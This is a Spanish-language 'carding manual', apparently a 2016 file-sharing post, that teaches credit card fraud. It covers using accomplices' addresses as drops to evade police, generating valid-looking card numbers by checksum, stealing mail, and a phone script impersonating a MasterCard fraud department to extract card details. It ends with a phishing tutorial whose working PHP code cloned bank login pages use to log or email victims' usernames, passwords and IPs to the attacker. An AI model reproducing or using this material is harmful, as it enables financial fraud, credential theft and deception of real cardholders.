manual de carding
Post on 17-Jan-2016
292 Views
Preview:
DESCRIPTION
TRANSCRIPT
Súper manual de carding
Contenido
1.-Todo sobre carding
2.-a) Estructura de las Tarjetas de Crédito
3.-b) Tengo el numero que hago?
4.-c)Ingeniería social para conseguir datos de Tarjetas de Crédito
5.-d) Scams y phishing para conseguir datos de Tarjetas de crédito
6.-e)a)Hacer un scam.
1.-Todo sobre Carding
Es el uso ilegitimo de las tarjetas de crédito, o de sus números, pertenecientes a otras
personas. Se relaciona con el hacking, porque para conseguir números de tarjetas de
créditos, una de las formas es utilizando Ingeniería Social y sobre todo nuestra
inteligencia (esto es lo más importante)
Se debe tener mucho cuidado en hacer esto ya que nos podemos meter en muchos líos.
Con nuestras tarjetas de crédito debemos ser cuidadosos ya que alguien puede leer este
documento antes que uno de ustedes y ser capaz de estafarlos.
Se puede recuperar el dinero tal vez pero para eso tendrían que hablar con el
administrador del sitio donde se realizo el pago del artículo solicitando la IP de donde se
hizo la compra y luego de todo esto tenemos que demostrar que nosotros no hicimos la
compra del mismo.
El carding consiste en comprar usando la cuenta bancaria o la tarjeta crédito de otro,
esto se consigue con un poco de ingeniería social y mucha perseverancia.
Cuando alguna persona utiliza carding para comprar objetos materiales se suele utilizar
una dirección falsa con una identificación también falsa, es decir todo el formulario de
compra lo llena con datos falsos.
De esta manera el comprador quedara esperando en el lugar indicado la entrega del
material como si se tratara de su residencia.
La filosofía de los carders se basa en que existe mucha gente que tiene grandes
cantidades de dinero que no cae nada mal utilizar algo de ese dinero para comprar
algunas cositas para cada uno de ellos, ya que posiblemente el dueño de la tarjeta ni se
dé cuenta de esta compra que él no la hizo.
Si ustedes están pensando en comprar por Internet programas o suscripciones y piensan
que utilizando el carding será muy fácil pues tienen toda la razón resulta muy sencillo.
En este manual se conseguirá revisar los métodos que utilizan los carders para hacerse
de los números de tarjetas y burlar las seguridades para poder comprar sin ningún tipo
de problemas.
Tienen que saber que el robo de una tarjeta de crédito es un delito universal por lo que
puede tener causas penales muy graves si no quieres irte de paseo a la cárcel no intenten
nada de esto.
Como hemos dicho antes, después de sacar los datos de la tarjeta de crédito si vamos a
usarlos para comprar por internet se ponen direcciones falsas, las direcciones que se
ponen son las de un dromp.
Un dromp es un compañero del carding, que recibe en su casa los productos que el
carder compra.
Esto se hace para que nadie acabe en la cárcel, por ejemplo, si alguien denuncia que an
comprado por internet con el dinero de su tarjeta, la policía lo primero que investigara
será la dirección a la que se envió el producto. Entonces irán a esa dirección, y hablaran
con el propietario de la casa que ha indicado la dirección.
El no negara todo, y entonces tendrán que comprobar la IP, verán que es diferente, y no
le podrán hacer nada.
En España por lo menos, ni le ponen una multa.
Al que hace todo eso se le llama dromp.
2.-a) Estructura de las Tarjetas de Crédito
Esto es importante ya que sabemos como están formadas las tarjetas de crédito.
Los números de las tarjetas se forman de 16 dígitos divididos en 4 grupos de 4 dígitos
pueden tener valores del 0 al 9 los primeros 4 dígitos sirven para determinar el banco.
Hagamos un ejemplo de la creación de un número de tarjeta:
Numero de tarjeta: 5180 2345 3942 8765
Las posiciones impares son:
5
8
2
4
3
4
8
6
Luego de esto se multiplica los 2 primeros dígitos entre si luego los siguientes y asi
sucesivamente para que sea mas claro quedaría de la siguiente forma:
5*8=40
2*4=8
3*4=12
8*6=48
Si tenemos cifras mayores a 9 se suma los números es decir las cifras reducidas 8+5=13
entonces
1+3=4
En el ejemplo quedaría así:
5*8=40 4+0=4
2*4=8 8
3*4=12 1+2=3
8*6=48 4+8=12 1+2=3
En resumen los números que nos quedan son:
4
8
3
3
Luego de esto suma los números pares que descartamos al principio y súmalos con estos
el resultado debe ser un número múltiplo de 10 para que el número sea correcto:
4+8+3+3+1+0+3+5+9+2+7+5=50
Si no nos diera un número correcto como va a suceder en la mayoría de los casos lo
recomendable es dejar el ultimo casillero libre y jugar con este digito hasta que nos de
un numero valido.
Esta es una de las formas de conseguir un número de tarjeta de crédito es decir
adivinando a ver si nos sale otra puede ser esperar pacientemente el fin de mes el
momento que llega el corte de pago de la tarjeta del vecino nos robamos su
correspondencia y listo ahí tenemos un numerito.
Otra de las formas es creando un portal de Internet donde ponemos artículos a la venta
se explicara esto más adelante.
3.-b) Tengo el numero que hago?
El momento de realizar una compra en línea nos solicitan una serie de datos pero los
mas importantes es decir los que nunca faltan son estos:
Nombre.
Numero de Cuenta.
Fecha de Expiración.
Tipo de tarjeta.
Numero de verificación
Estos datos son muy fáciles de conseguir (a veces)
El nombre es el de la victima sencillo de conseguir, el número de su tarjeta es un poco
más complicado pero hay formas revisando su correspondencia por ejemplo
La fecha de expiración la podremos conseguir haciéndonos pasar por el banco con los
datos que ya conocemos podremos decirle que vamos ampliar su cupo por sus pagos
puntuales o cualquier cosa esto ya queda a su imaginación lo que si nos queda claro es
que conseguir estos datos resulta sumamente sencillo.
Tipo de Tarjeta ya lo sabemos ya revisamos su correspondencia revisar paso uno
Para reconocer el tipo de tarjeta se puede utilizar, el primer digito de la tarjeta que nos
indica el tipo de la misma.
Si el primer número es....
3 ->American Express (15 dígitos)
4 ->VISA (13 o 16 dígitos)
5 ->Mastercard (16 dígitos)
6 ->Discover (16 dígitos)
Con estos datos ya se puede comprar algo en línea generalmente los carders realizan una
compra de algún software pequeño que sea de descarga o una subscripción para ver
pornografía esto lo hacen para probar si la tarjeta funciona o no .
Si el momento de la compra nos solicitaran mas datos ya saben que hacer es mas creo
que al momento de revisar su correo no tendrán estos datos tendrán muchos mas.
4.-c) Ingeniería Social para conseguir datos de Tarjetas de
Crédito
Para conseguir números y datos de una tarjeta de crédito siempre esta la ingeniería
social.
Por ejemplo, tu consigues el numero de teléfono de algún cliente de algún banco, le
llamas y le dices:
"Buenas tardes, soy Antonio Martinez de la sección fraudes de Master Card , hemos
detectado un posible uso fraudulento de su tarjeta, por lo que necesitamos que nos
indique todos los datos de la misma, para realizar una comprobación"
jeje, siempre hay alguien que pica en esto.
Para verificar si la tarjeta es útil se puede hacer una llamada a la entidad bancaria de
donde pertenece la tarjeta nos hacemos pasar como dueños de la tarjeta indicando que
quisimos hacer una compra y nuestra tarjeta fue rechazada para verificar si hablan con
el dueño de la tarjeta pedirán verificar unos datos harán preguntas sencillas como cual
es el numero de tarjeta, numero de verificación esto ya no es problema para nosotros ya
que tenemos toda la información que conseguimos antes al hacernos pasar como
empleados de la entidad que emite la tarjeta.
La información que conseguimos aquí es fundamental ya que podremos saber si la
tarjeta es principal o es un adicional si es de uso nacional o mundial cuanto es el cupo
que tiene la misma, etc.
Las compras que suelen hacer los carders son mediante Internet o telefónicamente no de
montos muy altos para que no se pida confirmación al dueño de la tarjeta y para no
levantar sospechas
El carder es muy cuidadoso no puede andar gritando al mundo sus hazañas porque el es
un ladrón el está robando, si hace un pedido de un articulo no puede pedir otro y otro
artículo a la misma dirección tiene que ir rotando de lugares.
Generalmente si el encargo está en la oficina de correos el ira cuando no haya nadie si
estuviera mucha gente preferirá no arriesgarse y ni siquiera acercarse más al lugar ya
que podría resultar peligroso para él.
Un carder nunca pide algo gigante no se comprara un carro para que le traigan por DHL
ni nada extremadamente caro (un collar de oro de 18 kilates) tampoco algo muy baratito
pero estaría bien que se compre una palm ultimo modelo ese es un buen carder.
El problema que se podría presentar es que el carder cada vez quiere comprar algo mas
y no para se vuelve más adicto por el riesgo y por qué se está comprando buenas cositas
pero no se da cuenta que tal vez lo tiene fichado y próximamente le haga una visita la
policía.
ADVERTENCIA: Recordad lo del dromp
5.-d) Scams y Phishing para conseguir datos de una Tarjeta de
Crédito
También se puede recurrir al Scam y al Phishing para conseguir datos de una tarjeta de
crédito.
El scam es una copia de una web utilizado para sacar contraseñas... y en este caso para
sacar datos de tarjetas de crédito.
El phishing es como la ingeniería social, consiste en enviar un email a la víctima, como
si fueras su típico banco del k el tanto se fía, y engañarle para que se meta en tu scam.
Por ejemplo, yo ago un scam de un banco, donde haya un formulario donde los clientes
metan los datos de sus tarjetas y puedan mover su dinero o hacer lo que quieran. Pues
bien una vez hecho el scam (ya explicare como) me ago pasar por ese banco enviando
un email a la victima diciéndole que por no seque razones tiene que rellenar ese
formulario. Si la víctima se lo cree, se meterá en el scam, y los datos nos los quedamos
nosotros.
6.-d)a)Hacer un scam
Hacer un scam es lo más sencillo que hay en la vida.
Tan solo tienes que ir a la web que quieres scammear y en la barra de herramientas del
explorer (o de mozilla, o de opera xD) klikas en ver/codigo fuente.
Lo pegas en un bloc de notas.
Después de esto haces los siguientes pasos:
la siguiente informacion se la he cojido a Facu.Hack
(http://hackxcrack.es/foro/index.php?topic=6280.0)
1. Miramos el código de la web que queremos clonar.
2. Cambiamos la parte del code del logeo y ponemos algo así:
<form method="GET" action="2.php">
<input type="text" name="user" size="20"><p>
<input type="text" name="pass" size="20"><p>
<input type="submit" value="Enviar" name="send">
</form>
Eso lo que hace es simular un login.
Donde dice "laweb.php" ponemos la web donde vamos a
montar el script .php donde se guardarán las passwords.
SCRIPT PARA GUARDAR UN ARCHIVO DE TEXTO:
<?
$user = strip_tags($_GET['user']);
$pass = strip_tags($_GET['pass']);
$ip = $_SERVER['REMOTE_ADDR'];
$todo = "User: ".$user." | Pass: ".$pass." | IP: ".$ip." \n";
$open = fopen("logins.txt","a");
fwrite($open,$todo);
fclose($open);
?>
<SCRIPT LANGUAGE="JavaScript">
location.href='www.lawebprincipal.com';
</SCRIPT>
SCRIPT PARA QUE TE LLEGE EMAIL
<?
$tumail = "tumail@gmail.com";
$user = strip_tags($_GET['user']);
$pass = strip_tags($_GET['pass']);
$ip = $_SERVER['REMOTE_ADDR'];
$todo = "User: ".$user." | Pass: ".$pass." | IP: ".$ip."";
mail($tumail,"Victima ".$user." - xD",$todo);
?>
Ahora me explico un poco para los que no lo an entendido.
Para que te lleguen los datos de la victima hay dos maneras.
Hay una, que es en el mismo scam, en un documento de texto.
Vamos que al scam tienes que subir: el login y robados.txt
En robados.txt se quedaran los datos de la víctima.
Y otra cosa que puedes hacer es que los datos de la victima te lleguen a tu email, para
eso copias el script del email y asta listo.
Bueno pos después de terminar tu scam solo tienes que hacer el phishing.
Para eso hazte una cuenta de email tipo esta: nombredelbanco@hotmail.com o algo
parecido, y en el cuerpo del mensaje utiliza la ingeniería inversa.
“y recordar que a la de comprar algo hay k utilizar el dromp.”
top related